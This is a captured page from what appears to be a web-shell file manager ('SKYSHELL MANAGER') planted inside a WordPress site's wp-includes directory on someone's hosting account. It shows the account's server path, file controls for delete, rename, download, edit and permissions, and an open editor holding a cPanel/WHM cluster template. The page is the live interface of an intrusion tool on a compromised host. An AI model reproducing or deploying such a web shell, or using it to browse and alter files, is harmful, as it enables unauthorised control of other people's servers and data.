📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: Clusters.tmpl
[%# This file is generated automatically. Do not edit it manually; instead, edit the /usr/local/cpanel/whostmgr/docroot/themes/x/dynamicui.conf file. -%] [% WRAPPER 'master_templates/master.tmpl' theme="bootstrap" app_key="clusters" -%] [% USE Whostmgr -%] [% USE JSON -%] [% USE EasyApache -%] [% USE VarCache -%] [% USE ServerRoles -%] [% USE Services -%] [% USE CPOS -%] [% varcache.set('checkacl_all',Whostmgr.checkacl('all')); %] [% varcache.set('dnsonly',Whostmgr.dnsonly()); %] <div id="iconSea" class="panel-body icon-container-body"> [% IF (varcache.checkacl_all) -%] [% varcache.set('locale_str',locale.makevar("Configuration Cluster")) %]<div class="item" data-page-type="feature"> <a class="item-link" href="[% cp_security_token %]/scripts7/setupcluster" target="" title='[% varcache.locale_str -%]'> <img class="itemImageWrapper" src="[% Whostmgr.get_icon_url('icons/configuration_cluster.svg') %]" alt="[% varcache.locale_str -%]" /> <span class="itemTextWrapper">[% varcache.locale_str -%]</span> </a> </div> [% END %] [% IF (varcache.checkacl_all || Whostmgr.checkacl('clustering')) && ServerRoles.is_role_enabled('DNS') -%] [% varcache.set('locale_str',locale.makevar("DNS Cluster")) %]<div class="item" data-page-type="feature"> <a class="item-link" href="[% cp_security_token %]/scripts7/clusterstatus" target="" title='[% varcache.locale_str -%]'> <img class="itemImageWrapper" src="[% Whostmgr.get_icon_url('icons/dns_cluster.svg') %]" alt="[% varcache.locale_str -%]" /> <span class="itemTextWrapper">[% varcache.locale_str -%]</span> </a> </div> [% END %] [% IF (Whostmgr.checkacl('manage-api-tokens')) && (Whostmgr.check_flag('CPCONF=allow_deprecated_accesshash')) -%] [% varcache.set('locale_str',locale.makevar("Remote Access Key")) %]<div class="item" data-page-type="feature"> <a class="item-link" href="[% cp_security_token %]/scripts/setrhash" target="" title='[% varcache.locale_str -%]'> <img class="itemImageWrapper" src="[% Whostmgr.get_icon_url('icons/remote_access_key.svg') %]" alt="[% varcache.locale_str -%]" /> <span class="itemTextWrapper">[% varcache.locale_str -%]</span> </a> </div> [% END %] </div> [% END -%]
Save